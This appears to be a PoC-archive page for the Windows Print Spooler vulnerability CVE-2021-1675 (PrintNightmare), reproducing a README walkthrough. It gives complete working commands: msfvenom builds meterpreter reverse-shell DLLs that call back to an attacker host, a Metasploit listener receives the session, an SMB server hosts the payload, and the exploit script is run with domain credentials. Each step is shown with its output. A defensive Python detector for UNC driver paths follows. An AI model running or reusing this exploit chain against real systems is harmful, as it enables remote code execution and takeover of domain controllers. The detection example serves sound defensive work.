Related vulnerability
Title:
Microsoft Windows Print Spooler Components security vulnerability
(CVE-2021-1675)
Description: Microsoft Windows Print Spooler Components is a print spooler component from Microsoft Corporation (USA). A security vulnerability exists in Microsoft Windows Print Spooler Components. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows 10 Version 1809 for AR
Introduction
### Explanation of the vulnerability
The Print Spooler is a Windows service that manages print queues. It receives jobs submitted by users, converts them to a format the printer understands, and sends them when the printer is available. It runs as a system service (spoolsv.exe) with high privileges, which makes it a frequent target of attacks such as the PrintNightmare vulnerability.
### How to exploit it
Before attempting to exploit the print spooler remotely, we can check whether a host exposes the spooler RPC interfaces that PrintNightmare relies on with [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py), part of the impacket package, a set of tools widely used in pentesting. If the host advertises MS-RPRN or MS-PAR, the print system RPC interfaces are reachable over the network:
```bash
❯ rpcdump.py @10.10.188.66 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
```
The exploit is delivered as a malicious DLL. This method, referred to here as "fileless" exploitation, allows us to bypass most system protections such as antivirus software. In this attack we trick the print spooler service into installing a new driver from a UNC path and loading it; in our case that driver is the malicious DLL, which gives us a reverse shell back to the attacking machine. To create the DLL I will use msfvenom and, depending on the target architecture, embed a Windows x64 or x86 payload, supplying the local host and local port on which we will start a listener for the DLL's callback. You can find your machine's IP address with `ifconfig`. The following command creates the malicious DLL:
```bash
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x64.dll
```
If instead the target architecture is 32-bit, we would use this payload:
```bash
❯ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 -f dll -o /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of dll file: 9216 bytes
Saved as: /home/ghost/Pentesting/Print/PrintMalicious_x86.dll
```
Now that we have created the malicious DLL, we start a listener in the Metasploit Framework to receive the Meterpreter shell when the DLL is executed on the target. To start the listener, follow the steps below; at the end, `exploit -j` starts it as a background job.
```bash
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.10
LHOST => 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.10:443
```
With the listener running, we start an SMB server to host the malicious DLL. Before doing so, make sure Impacket is installed: it is a collection of open-source Python modules, one of which is `smbserver.py`, the script we use here. Change to the directory where the DLL was saved (in my case `/home/ghost/Pentesting/Print/`) and run the following command to start the SMB server and share that directory:
```bash
❯ smbserver.py share . -smb2support
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
We are now set up to run the [CVE-2021-1675](https://github.com/DLL00P/CVE-2021-1675) proof-of-concept (PoC). We pass it the domain controller, the user credentials, and the UNC path to the malicious DLL hosted on our SMB server:
```bash
❯ python3 CVE-2021-1675.py NetworkAD-EDU.ENGdepartment.local/jjsmith:wellsaidsecurity143@10.10.220.93 '\\10.10.10.10\share\PrintMalicious_x64.dll'
[*] Connecting to ncacn_np:10.10.220.93[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.10.10\share\PrintMalicious_x64.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
```
A few seconds after the exploit script starts, the Metasploit listener reports that a Meterpreter session has been opened, and we can interact with the victim machine through the Meterpreter shell.
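From the defender's side, the technique above leaves a tell-tale trace: the spooler records a driver or plug-in path pointing at a UNC share, and the PoC retries the install several times in quick succession. The Python below is an added example, not part of the original README or the PoC; it runs those two checks over constructed sample records modelled on Microsoft-Windows-PrintService/Operational events (IDs 316, driver added/updated, and 808, plug-in load failure). The record layout, timestamps and hostnames are this example's own assumptions.

```python
import re
from collections import defaultdict

# Directories the spooler legitimately loads drivers and plug-ins from (assumed defaults).
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\spool\\drivers\\",
    "c:\\windows\\system32\\driverstore\\filerepository\\",
)
# Matches both forms seen in spooler output: \??\UNC\host\share\ and \\host\share\
UNC_RE = re.compile(r"^(\\\?\?\\unc\\|\\\\)[^\\]+\\", re.IGNORECASE)


def classify_driver_path(path: str) -> str:
    """'unc' for a network path, 'trusted' for a spooler driver directory,
    'local_untrusted' for any other local location."""
    p = path.strip().lower()
    if UNC_RE.match(p):
        return "unc"
    if p.startswith(TRUSTED_PREFIXES):
        return "trusted"
    return "local_untrusted"


def find_suspicious(events, burst_window=30, burst_count=3):
    """Return (ts, host, reason) alerts: any driver/plug-in path outside the trusted
    directories, plus `burst_count` driver adds (ID 316) from one host within `burst_window` s."""
    alerts, recent_adds = [], defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        kind = classify_driver_path(ev["path"])
        if kind != "trusted":
            alerts.append((ev["ts"], ev["host"], f"{kind} driver path: {ev['path']}"))
        if ev["event_id"] == 316:
            window = [t for t in recent_adds[ev["host"]] if ev["ts"] - t <= burst_window]
            window.append(ev["ts"])
            recent_adds[ev["host"]] = window
            if len(window) == burst_count:
                alerts.append((ev["ts"], ev["host"], f"{burst_count} driver adds within {burst_window}s"))
    return alerts


# Constructed sample telemetry: one benign driver add, then the PoC's UNC install retried 3 times.
SAMPLE_EVENTS = [
    {"ts": 1000, "event_id": 316, "host": "DC01", "path": r"C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL"},
    {"ts": 1061, "event_id": 808, "host": "DC01", "path": r"\??\UNC\10.10.10.10\share\PrintMalicious_x64.dll"},
    {"ts": 1062, "event_id": 316, "host": "DC01", "path": r"\\10.10.10.10\share\PrintMalicious_x64.dll"},
    {"ts": 1064, "event_id": 316, "host": "DC01", "path": r"\\10.10.10.10\share\PrintMalicious_x64.dll"},
    {"ts": 1066, "event_id": 316, "host": "DC01", "path": r"\\10.10.10.10\share\PrintMalicious_x64.dll"},
    {"ts": 2000, "event_id": 316, "host": "WS07", "path": r"C:\Windows\System32\spool\drivers\x64\3\sample_vendor.dll"},
]

if __name__ == "__main__":
    for ts, host, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"{ts} {host}: {reason}")
```

The same rules apply to Sysmon image-load events for spoolsv.exe: a DLL loaded from a UNC path or outside the driver directories deserves the same alert.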
File snapshot
[4.0K] /data/pocs/2810157adc623ed31607d0301bf229090d9a8ddf
├── [8.3K] CVE-2021-1675.py
└── [5.5K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.